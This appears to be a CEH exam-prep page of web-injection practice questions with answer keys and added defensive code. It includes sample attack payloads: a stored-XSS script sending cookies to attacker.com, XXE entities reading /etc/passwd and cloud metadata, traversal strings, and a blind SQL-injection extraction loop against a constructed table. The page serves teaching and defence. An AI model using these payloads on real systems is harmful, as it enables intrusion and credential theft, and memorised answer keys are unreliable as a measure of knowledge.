CEH Web Injection Questions
22 of 172 questions · Page 3/3 · CEH Web Injection topic
A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?
Select 3 answers
A.SQL injection
B.Arbitrary file read on the server
C.Denial of Service (DoS)
D.Server-Side Request Forgery (SSRF)
E.Remote code execution via command injection
AnswersB, C, D
External entities let the parser read local files, fetch URLs on the server's behalf, or expand nested entities until memory is exhausted.
Why this answer
XXE can be used for reading local files (e.g., /etc/passwd), for SSRF by making the server issue requests to internal addresses, and for denial of service (e.g., the billion laughs entity-expansion attack). Remote code execution (E) is not a general XXE impact; it needs an unusual parser environment such as PHP's expect:// wrapper. SQL injection (A) is an unrelated injection class.
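The three impacts above each leave a recognisable trace in the DTD of the incoming document. The following example, added here and not part of the course material, classifies untrusted XML by the impact a DTD-processing parser would suffer, using constructed sample payloads and a lexical scan rather than a real parser (so nothing is fetched or expanded). Any external entity whose scheme is not file: is counted as SSRF, since the parser would open that URL. The thresholds and the reject_dtd() policy are assumptions: the simplest real-world mitigation is to refuse any document that declares a DTD.

```python
import re

# Constructed samples (not captured traffic): a benign document and XXE payloads
# for the file-read and SSRF impacts. The DoS payload is built by billion_laughs().
SAMPLES = {
    "benign": "<?xml version='1.0'?><order><id>42</id></order>",
    "file_read": (
        "<?xml version='1.0'?>"
        "<!DOCTYPE d [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
        "<order><id>&xxe;</id></order>"
    ),
    "ssrf": (
        "<?xml version='1.0'?>"
        "<!DOCTYPE d [<!ENTITY xxe SYSTEM 'http://169.254.169.254/latest/meta-data/'>]>"
        "<order><id>&xxe;</id></order>"
    ),
}


def billion_laughs(levels: int) -> str:
    """Nested internal entities; each level references the previous one ten times."""
    names = "abcdefghij"[:levels]
    decls = [f"<!ENTITY {names[0]} 'lol'>"]
    for prev, cur in zip(names, names[1:]):
        refs = f"&{prev};" * 10
        decls.append(f"<!ENTITY {cur} '{refs}'>")
    return f"<?xml version='1.0'?><!DOCTYPE lolz [{''.join(decls)}]><x>&{names[-1]};</x>"


EXTERNAL_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+SYSTEM\s+['\"]([^'\"]+)['\"]")
INTERNAL_RE = re.compile(r"<!ENTITY\s+%?\s*(\w+)\s+['\"]([^'\"]*)['\"]")


def expanded_size(name, defs, memo, depth=0):
    """Length an internal entity would have after full expansion, computed
    arithmetically so the check itself cannot be blown up."""
    if name in memo:
        return memo[name]
    if depth > 64:                      # recursive or absurdly deep: treat as unbounded
        return 10 ** 12
    value = defs.get(name, "")
    size, pos = 0, 0
    for m in re.finditer(r"&(\w+);", value):
        size += m.start() - pos + expanded_size(m.group(1), defs, memo, depth + 1)
        pos = m.end()
    memo[name] = size + len(value) - pos
    return memo[name]


def classify_xxe(xml_text: str, dos_threshold: int = 10_000) -> list:
    """Impacts a DTD-processing parser could suffer from this document:
    'file_read' (file: entity), 'ssrf' (any other external entity),
    'dos' (entity expansion beyond dos_threshold characters).
    Empty list means no DOCTYPE at all."""
    if "<!DOCTYPE" not in xml_text:
        return []
    findings = set()
    for uri in EXTERNAL_RE.findall(xml_text):
        scheme = uri.split(":", 1)[0].lower()
        findings.add("file_read" if scheme == "file" else "ssrf")
    defs = dict(INTERNAL_RE.findall(xml_text))
    memo = {}
    if any(expanded_size(n, defs, memo) > dos_threshold for n in defs):
        findings.add("dos")
    return sorted(findings)


def reject_dtd(xml_text: str) -> bool:
    """The blunt mitigation: refuse any document that declares a DTD at all."""
    return "<!DOCTYPE" in xml_text
```

In production, pair the DOCTYPE rejection with a parser configured not to resolve external entities at all (for example defusedxml in Python, or disabling external general/parameter entities in Java's XML factories); the classifier is for triage of what was attempted, not a substitute for a hardened parser.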
Which of the following is the BEST defense against brute-force attacks on a login form?
A.Rate limiting on the login endpoint
B.CAPTCHA
C.Complex password policy
D.Account lockout after 5 failed attempts
AnswerA
Rate limiting throttles guesses without locking anyone out; lockout is narrower and can be turned against legitimate users.
Why this answer
Rate limiting on the login endpoint is the best defense because it directly caps how many attempts an attacker can make in a given window, which is what makes brute force impractical. Unlike a reactive control such as account lockout, it throttles before the attacker has used up a guess budget, and it does not hand an attacker a way to lock legitimate users out. It holds up against distributed attacks only if the limit is keyed on the target account (optionally combined with device or session signals) and not on source IP alone: an IP-only limit is bypassed by rotating addresses, just as per-account lockout is bypassed by rotating usernames.
Exam trap
EC-Council often tests the misconception that account lockout is the strongest defense. The trap is that lockout can be circumvented by spraying a few passwords across many usernames, and it can be weaponized into a denial of service against the very accounts it protects, whereas rate limiting is a proactive, scalable control applied at the application or edge layer.
How to eliminate wrong answers
Option B (CAPTCHA) is wrong because, while it slows automated attacks, it can be bypassed with OCR, machine learning, or third-party solving services, and it degrades the user experience. Option C (Complex password policy) is wrong because it only enlarges the search space; it does not stop the attempts themselves, and attackers can keep guessing over time. Option D (Account lockout after 5 failed attempts) is wrong because it is a reactive, per-account measure: an attacker can lock legitimate users out on purpose, and can stay under the threshold by spreading a few guesses across many usernames (password spraying), which per-account lockout never sees.
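The distinction the answer turns on (throttling keyed on the account as well as the source, with no permanent lockout) is easier to see in code. The following sliding-window limiter is an added example, not the course's or any product's code; the limits, window, and traffic scenarios are assumed values constructed for illustration. Timestamps are passed in explicitly so the scenarios are deterministic.

```python
from collections import defaultdict, deque


class LoginRateLimiter:
    """Sliding-window limiter keyed on the target account and on the source IP.
    Limits are assumed illustrative values, not a recommendation."""

    def __init__(self, per_account=10, per_ip=50, window_seconds=60):
        self.per_account = per_account
        self.per_ip = per_ip
        self.window = window_seconds
        self.events = defaultdict(deque)        # key -> timestamps of recent attempts

    def _recent(self, key, now):
        q = self.events[key]
        while q and q[0] <= now - self.window:  # drop attempts outside the window
            q.popleft()
        return len(q)

    def allow(self, username, ip, now):
        """True if the attempt may be processed. Throttled attempts are still
        recorded, so hammering during a throttle does not shorten it."""
        acct_key = ("account", username.lower())
        ip_key = ("ip", ip)
        ok = (self._recent(acct_key, now) < self.per_account
              and self._recent(ip_key, now) < self.per_ip)
        self.events[acct_key].append(now)
        self.events[ip_key].append(now)
        return ok


def run_scenarios():
    """Constructed attack traffic against fresh limiters; returns how many
    attempts each scenario got through."""
    results = {}

    # 1. Distributed brute force: 30 guesses at 'alice', one per second, each from
    #    a different IP. The per-IP limit never triggers; the per-account key does.
    lim = LoginRateLimiter()
    got = sum(lim.allow("alice", f"203.0.113.{i}", float(i)) for i in range(30))
    results["distributed_single_account"] = got

    # 2. The legitimate owner retries after the window has passed: unlike lockout,
    #    the throttle clears by itself.
    results["victim_allowed_after_window"] = lim.allow("alice", "198.51.100.9", 120.0)

    # 3. Password spray: one IP, 100 usernames, one guess each. Per-account limits
    #    and per-account lockout never trigger; the per-IP key does.
    lim = LoginRateLimiter()
    got = sum(lim.allow(f"user{i:03d}", "198.51.100.7", float(i)) for i in range(100))
    results["spray_from_one_ip"] = got
    return results
```

Scenario 1 is the case where an IP-only limiter fails and scenario 3 is the case where per-account lockout fails; a limiter has to key on both to cover both. In a real deployment the deques would live in a shared store such as Redis so that every login node sees the same counts.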
A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)
Select 2 answers
A.Directory traversal
B.Remote file inclusion (RFI)
C.SQL injection
D.Local file inclusion (LFI)
E.Command injection
AnswersA, D
The '../' pattern indicates an attempt to access files outside the web root.
Why this answer
The '../' sequences walk up out of the web root (directory traversal), and the target is a local file on the server. If the parameter feeds an include/require so the fetched file is parsed or executed, the same request is a local file inclusion (LFI) attempt; if the file is only read back, it is plain traversal. The '../' vector is shared, so both A and D fit the log line.
A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?
A.Cross-Site Scripting (XSS)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.SQL injection
AnswerA
Reflecting user input (User-Agent) without sanitization allows XSS.
Why this answer
Any request-controlled value that is reflected into the response body without output encoding produces reflected XSS; a header such as User-Agent is just a less obvious injection point than a URL parameter. One practical caveat: because a victim's browser sets its own User-Agent, header reflection is hard to turn against other users as reflected XSS, and it is most dangerous when the value is also logged or stored and later shown to an administrator.
A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)
B.Using HTTP GET requests for state-changing operations
C.Setting SameSite cookies to Lax or Strict
D.Including a unique CSRF token in each request
E.Validating the Origin or Referer header
AnswersC, D, E
SameSite attribute prevents cookies from being sent in cross-site requests.
Why this answer
SameSite=Lax or Strict stops the browser attaching the session cookie to cross-site POSTs (Lax still sends it on top-level GET navigations, one more reason not to change state on GET). A CSRF token that is unpredictable, tied to the session, and checked server-side cannot be supplied by a page on another origin. Validating Origin (or, failing that, Referer) rejects state-changing requests whose source is not the application's own origin. Option B is the opposite of a mitigation: a state-changing GET can be triggered by a plain link or <img> tag.
A double-submit cookie is another valid token pattern, though less common. MFA does not prevent CSRF because the forged request rides on a session that is already authenticated.
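The three mitigations from the answer compose into one server-side check. The following is an added example, not code from the course or from any framework: the site origin, the server secret, and the request dictionaries are assumptions constructed for the demonstration, and the token is derived with HMAC from the session ID so the server does not need to store it. Real requests would arrive through a web framework; the dict stands in for its request object.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example.com"      # assumed application origin
SECRET = b"assumed-server-side-secret"        # assumed; in practice loaded from a secret store


def csrf_token(session_id: str, secret: bytes = SECRET) -> str:
    """Token bound to the session via HMAC-SHA256; nothing extra is stored server-side."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value with the attributes that blunt CSRF and cookie theft."""
    return f"session={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


def csrf_check(request: dict, secret: bytes = SECRET):
    """request is a constructed dict with keys method, headers, cookies, form.
    Returns (allowed, reason). Applies origin validation and token validation;
    the SameSite attribute is the browser-side layer set by session_cookie_header()."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method; must not change state"
    headers = {k.lower(): v for k, v in request["headers"].items()}
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "state-changing request without Origin or Referer"
    p = urlsplit(source)
    if f"{p.scheme}://{p.netloc}" != SITE_ORIGIN:
        return False, f"cross-site source {p.scheme}://{p.netloc}"
    session_id = request["cookies"].get("session")
    if not session_id:
        return False, "no session cookie"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(csrf_token(session_id, secret), supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def build_request(method, origin, cookies, form, headers=None):
    """Helper to construct the request dicts used in the scenarios."""
    h = dict(headers or {})
    if origin is not None:
        h["Origin"] = origin
    return {"method": method, "headers": h, "cookies": cookies, "form": form}
```

The order matters: the Origin check is cheap and rejects the forged request before the token is even looked at, and hmac.compare_digest keeps the token comparison constant-time. A cross-site POST from an attacker page carries the attacker's Origin and no token, so it fails both checks even on a browser that ignores SameSite.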
In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?
A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerA
Repeater allows sending and resending individual requests with manual modifications.
Why this answer
Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.
During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
Select 3 answers
A.Directory traversal
B.Credential stuffing
C.Brute-force attack
D.SQL injection
E.Password spraying
AnswersB, C, E
Valid usernames can be used with breached password lists.
Why this answer
With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.
After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?
A.Credential stuffing
B.Brute force attack
C.Password spraying
D.Dictionary attack
AnswerC
Password spraying uses a few common passwords rather than a long list per account, spreading the attempts so no lockout threshold is crossed.
Why this answer
Password spraying uses a small set of common passwords against many accounts or, as in this scenario, against a single account from many source IPs to avoid lockout and per-IP blocking. Strictly, the defining feature is few passwords across many accounts; one account hit with a common-password list from rotating IPs is closer to a distributed dictionary attack, but EC-Council's framing (a list of common passwords plus lockout evasion) points to C rather than B or D.
A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?
A.Reflected Cross-Site Scripting (XSS)
B.Command Injection
C.Cross-Site Request Forgery (CSRF)
D.Insecure Direct Object Reference (IDOR)
AnswerD
IDOR occurs when an application exposes references (e.g., user ID) and fails to verify authorization, allowing attackers to access other objects.
Why this answer
This is an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper access control checks.
A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?
A.Reflected XSS
B.Cross-site request forgery (CSRF)
C.DOM-based XSS
D.Stored XSS
AnswerD
The malicious script is stored in the feedback database and executed when the admin retrieves it.
Why this answer
The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.
An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?
A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Blind XSS
AnswerB
The script is injected via a URL parameter and immediately reflected in the server's response, which is the definition of reflected XSS.
Why this answer
This is a typical reflected XSS because the malicious script is injected via a GET parameter and immediately reflected in the response without persistent storage.
An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?
A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC
SSRF involves the server making unintended requests to internal or external systems.
Why this answer
SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.
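A server that fetches user-supplied URLs needs a validator that refuses the destinations an SSRF attacker wants: loopback, private and link-local addresses (including cloud metadata endpoints), non-HTTP schemes, and URLs that smuggle a different host in the userinfo part. The following example is added here and is not code from the course; the allowlist, the port policy, and the probe URLs are constructed assumptions. It is lexical only, so it runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.partner.example", "cdn.example.org"}   # assumed allowlist


def check_outbound_url(url: str, allowed_hosts=ALLOWED_HOSTS):
    """Decide whether the server may fetch a user-supplied URL. Returns (ok, reason)."""
    try:
        p = urlsplit(url)
        host = p.hostname        # lowercased; IPv6 brackets stripped
        port = p.port            # raises ValueError on a malformed port
    except ValueError as e:
        return False, f"unparseable URL: {e}"
    if p.scheme not in ("http", "https"):
        return False, f"scheme {p.scheme!r} not allowed"
    if not host:
        return False, "no host"
    if p.username or p.password:
        return False, "userinfo in URL (user@host confusion)"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        if not ip.is_global:   # loopback, RFC 1918, link-local (169.254.0.0/16), ::1 ...
            return False, f"{host} is loopback, private, or link-local"
        return False, "literal IP addresses are not allowlisted"
    if host not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"
    if port not in (None, 80, 443):
        return False, f"port {port} not allowed"
    return True, "ok"


# Constructed probe URLs: one legitimate destination and typical SSRF targets.
PROBES = [
    "https://api.partner.example/v1/report",
    "http://169.254.169.254/latest/meta-data/",     # cloud metadata endpoint
    "http://127.0.0.1:8080/admin",
    "http://[::1]/",
    "http://10.0.0.5/",
    "http://2130706433/",                           # 127.0.0.1 as a decimal integer
    "file:///etc/passwd",
    "https://api.partner.example@evil.example/",    # allowlisted name in userinfo
    "https://cdn.example.org:8443/x",
]


def triage(urls=PROBES):
    """Map each probe to the validator's verdict."""
    return {u: check_outbound_url(u)[0] for u in urls}
```

A hostname allowlist is the only check that defeats the decimal-IP and similar encodings without enumerating them. It does not, on its own, cover DNS rebinding or a redirect from an allowed host to an internal one; for that, resolve the name yourself, connect to the resolved address, and disable automatic redirect following in the HTTP client.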
Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?
A.Burp Suite
B.Metasploit
C.SQLMap
D.Nmap
AnswerC
SQLMap is the standard tool for automated SQL injection detection and exploitation.
Why this answer
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It supports a wide range of database backends and injection techniques, making it the go-to tool for this specific task.
Exam trap
EC-Council often tests the distinction between general-purpose security tools (like Burp Suite or Metasploit) and specialized automation tools (like SQLMap), leading candidates to choose a tool they recognize for web testing rather than the one specifically designed for SQL injection automation.
How to eliminate wrong answers
Option A is wrong because Burp Suite is an intercepting proxy and web application security testing platform that requires manual configuration or extensions to automate SQL injection exploitation; it is not purpose-built for automated SQL injection detection and exploitation. Option B is wrong because Metasploit is a framework for developing and executing exploit code against remote targets, but it does not natively automate the detection and exploitation of SQL injection vulnerabilities in web applications without additional modules or manual scripting. Option D is wrong because Nmap is a network scanning tool used for host discovery, port scanning, and service enumeration, and it lacks any capability to detect or exploit SQL injection vulnerabilities.
During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?
A.Remote File Inclusion (RFI)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Local File Inclusion (LFI)
AnswerB
The attacker is traversing directories to read arbitrary files, which is directory traversal.
Why this answer
The use of '../' sequences to climb out of the web root and read an arbitrary file is classic directory traversal. The key reserves LFI (D) for the case where the parameter is passed to an include/require so the fetched file is parsed or executed; the scenario only says the file is fetched and its contents displayed, so B is the tighter fit.
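Both this question and the earlier log-review question ('GET /page?file=../../../etc/passwd') come down to the same server-side mistake: joining a request path onto the document root without checking that the result still lies under it. The following example is added here and is not code from the course; the document root and the request paths are constructed assumptions. It resolves the path lexically (so it runs offline) and handles the usual evasions: URL encoding, double encoding, backslashes, and null bytes.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/app/public"   # assumed document root


def resolve_under_root(user_path: str, root: str = WEB_ROOT, max_decode: int = 3):
    """Map a request-supplied path onto root; return the absolute path to serve,
    or None if it would escape root. Absolute request paths are anchored to root."""
    root = posixpath.normpath(root)
    decoded = user_path
    for _ in range(max_decode):            # peel %2e%2e%2f and double encodings (%252e)
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:                  # truncation tricks such as index.html%00.jpg
        return None
    decoded = decoded.replace("\\", "/")   # backslash traversal on Windows-hosted apps
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed request paths and the expected resolution under WEB_ROOT.
REQUESTS = {
    "images/logo.png": "/srv/app/public/images/logo.png",
    "docs/../index.html": "/srv/app/public/index.html",
    "/etc/passwd": "/srv/app/public/etc/passwd",
    "../../../etc/passwd": None,
    "..%2F..%2F..%2Fetc%2Fpasswd": None,
    "%252e%252e%252f%252e%252e%252fetc/passwd": None,
    "..\\..\\..\\windows\\win.ini": None,
    "index.html%00.jpg": None,
}


def check_all(cases=REQUESTS):
    """Resolve every constructed request path."""
    return {req: resolve_under_root(req) for req in cases}
```

The lexical check is necessary but not sufficient on a real filesystem: a symlink inside the root can still point outside it, so after this check call os.path.realpath() on the candidate and repeat the prefix comparison against the realpath of the root before opening the file.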
A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?
A.Password spraying
B.Credential stuffing
C.Brute force attack
D.Dictionary attack
AnswerA
Password spraying uses a few passwords across many accounts to avoid lockouts.
Why this answer
Password spraying tries a small number of common passwords against many user accounts so that no single account crosses its lockout threshold. Contrast credential stuffing, which replays breached username:password pairs (typically one pair per account), and brute force, which tries many passwords against one account.
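The three credential attacks in this and the two earlier questions (no rate limiting with username enumeration; one account hit from many IPs; a few passwords across many accounts) look different in an authentication log, and per-account lockout only ever sees one of the shapes. The following detector is an added example, not the course's or any SIEM's code; the log format is an assumed key=value layout and the lines are constructed, not captured. It does not try to name the attack (passwords are not logged), only to surface the two things a responder acts on: accounts under attack and source IPs spreading failures across many accounts.

```python
import re
from collections import defaultdict


def build_sample_log():
    """Constructed log lines in an assumed 'key=value' format (not a real product's)."""
    lines = []
    # Brute force: 12 failures against alice from one IP.
    for t in range(12):
        lines.append(f"2024-05-01T10:00:{t:02d}Z ip=203.0.113.5 user=alice result=fail")
    # Password spray: one IP, one guess each against 15 different users.
    for i in range(15):
        lines.append(f"2024-05-01T10:01:{i:02d}Z ip=198.51.100.7 user=user{i:02d} result=fail")
    # Normal user: one typo, then success.
    lines.append("2024-05-01T10:02:00Z ip=192.0.2.10 user=bob result=fail")
    lines.append("2024-05-01T10:02:05Z ip=192.0.2.10 user=bob result=success")
    return lines


LINE_RE = re.compile(r"ip=(\S+)\s+user=(\S+)\s+result=(\S+)")


def analyze_auth_log(lines, account_threshold=8, spray_user_threshold=10):
    """Flag accounts receiving many failures (brute force, from one or many IPs)
    and source IPs failing against many distinct accounts (spraying or stuffing).
    Thresholds are assumed values for the sample; tune them per environment."""
    fails_per_user = defaultdict(int)
    ips_per_user = defaultdict(set)
    users_per_ip = defaultdict(set)
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m.group(3) != "fail":
            continue
        ip, user = m.group(1), m.group(2)
        fails_per_user[user] += 1
        ips_per_user[user].add(ip)
        users_per_ip[ip].add(user)
    targeted = {u: {"failures": n, "source_ips": len(ips_per_user[u])}
                for u, n in fails_per_user.items() if n >= account_threshold}
    sprayers = {ip: len(users) for ip, users in users_per_ip.items()
                if len(users) >= spray_user_threshold}
    return {"targeted_accounts": targeted, "spray_sources": sprayers}
```

The source_ips count on a targeted account is what distinguishes a single-source brute force from the distributed variant in the earlier question, and the spray_sources view is the one a per-account lockout policy never gets, since each account in a spray fails only once.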
A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?
A.Error-based SQL injection
B.Union-based SQL injection
C.Time-based blind SQL injection
D.Out-of-band SQL injection
AnswerC
Time-based uses conditional delays to infer Boolean results; response time differences are the key indicator.
Why this answer
Time-based blind SQL injection relies on inducing a delay (e.g., SLEEP() on MySQL or WAITFOR DELAY on SQL Server) and reading the truth of a condition from the response time. The observed difference (2 s vs 0.5 s) is the kind of signal such an attack uses. On its own it is only a suspicion; it is confirmed by injecting a conditional delay and seeing the response time follow the injected condition.
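Blind injection, whether the oracle is a row/no-row difference or a delay, extracts data one yes/no question at a time, and parameterised queries remove the oracle entirely. The following is an added example, not code from the course: it uses an in-memory SQLite table with constructed rows, a string-built query beside its bound-parameter replacement, and an extraction loop. SQLite has no SLEEP(), so the loop uses the Boolean-blind variant; a time-based attack runs the same loop with a conditional delay as the oracle.

```python
import sqlite3


def make_db():
    """In-memory table with constructed rows (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn


def user_exists_vulnerable(conn, user_id: str) -> bool:
    # The request parameter is pasted into the SQL text, so it can rewrite the WHERE clause.
    row = conn.execute(f"SELECT 1 FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def user_exists_safe(conn, user_id: str) -> bool:
    # Type-check, then bind: the value is data and can never become SQL syntax.
    try:
        uid = int(user_id)
    except ValueError:
        return False
    return conn.execute("SELECT 1 FROM users WHERE id = ?", (uid,)).fetchone() is not None


def blind_extract(conn, target_id: str, column: str,
                  oracle=user_exists_vulnerable, max_len: int = 32) -> str:
    """Recover a column value one character at a time from a yes/no oracle.
    Against a time-based target the probe would be e.g. '... AND IF(cond, SLEEP(5), 0)'
    and the oracle would compare response times instead of row counts."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            probe = f"{target_id} AND unicode(substr({column}, {pos}, 1)) = {code}"
            if oracle(conn, probe):
                recovered += chr(code)
                break
        else:
            break                      # no character matched: end of the string
    return recovered
```

Against the vulnerable oracle the loop recovers alice's password from nothing but true/false answers; against the bound-parameter version every probe fails int() and the loop returns an empty string. That is the whole argument for parameterised queries: they do not filter payloads, they remove the interpretation step the payload needs.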
During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?
A.Set the User-Agent to: <img src=x onerror=alert(1)>
B.Set the User-Agent to: ' OR '1'='1
C.Set the User-Agent to: <script>alert('XSS')</script>
D.Set the User-Agent to: ../../../../etc/passwd
AnswerC
If the User-Agent is reflected into the HTML body unencoded, this payload runs JavaScript in the browser, which proves the vulnerability.
Why this answer
A script alert such as <script>alert('XSS')</script> is the standard proof of concept for reflected XSS: the exact payload may vary, but it must execute JavaScript, and the alert is the simplest demonstration. Option A (<img src=x onerror=alert(1)>) also executes JavaScript in a body context and is the usual fallback when <script> is filtered or the value is inserted via innerHTML, where script elements do not run; both A and C demonstrate the issue, and the key expects C. Options B and D are SQL injection and directory traversal payloads and prove nothing about XSS.
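The four XSS questions on this page (User-Agent reflection, stored feedback, the reflected search term, and the proof-of-concept payload) share one fix: encode for the context the value lands in. The following is an added example, not code from the course; the templates are assumed fragments and the payloads are constructed from the options in this question plus two breakouts. It contrasts a raw reflection with HTML-body, attribute, and JavaScript-string encoders, including the case where json.dumps alone is not enough.

```python
import html
import json
import re


def encode_for_html(value: str) -> str:
    """HTML body or quoted-attribute context: escape & < > and both quote characters."""
    return html.escape(value, quote=True)


def encode_for_js(value: str) -> str:
    """JavaScript string context: JSON-encode, then neutralise the characters that
    would let the value close the enclosing <script> element (json.dumps leaves
    '<', '>' and '&' untouched)."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_search_vulnerable(q: str) -> str:
    return f"<div>Results for {q}</div>"                       # raw reflection


def render_search(q: str) -> str:
    return f"<div>Results for {encode_for_html(q)}</div>"


def render_agent_attr(user_agent: str) -> str:
    # Attribute context is safe with the same encoder only because the value is quoted.
    return f'<span data-agent="{encode_for_html(user_agent)}">client</span>'


def naive_inline_js(q: str) -> str:
    return f"<script>var q = {json.dumps(q)};</script>"        # still breakable


def render_inline_js(q: str) -> str:
    return f"<script>var q = {encode_for_js(q)};</script>"


# Constructed payloads: the two JavaScript-executing options from the question,
# an attribute breakout, and a script-context breakout.
PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert(1)>",
    '" onmouseover="alert(1)',
    "</script><script>alert(1)</script>",
]


def html_text_is_inert(encoded: str) -> bool:
    """No raw markup-significant character survived encoding."""
    return not (set("<>\"'") & set(encoded))


def js_literal_is_inert(literal: str) -> bool:
    """A single JSON string literal with no raw angle brackets and no unescaped quote inside."""
    return (literal[:1] == literal[-1:] == '"'
            and "<" not in literal and ">" not in literal
            and re.search(r'(?<!\\)"', literal[1:-1]) is None)
```

The encoder is chosen by destination, not by source: the same User-Agent value needs encode_for_html() in a <div>, the same again inside a quoted attribute, and encode_for_js() inside a script block. A Content-Security-Policy that disallows inline script is the defense-in-depth layer for the case an encoder is missed, and it would also have stopped the cookie-exfiltrating script in the stored-XSS question from running.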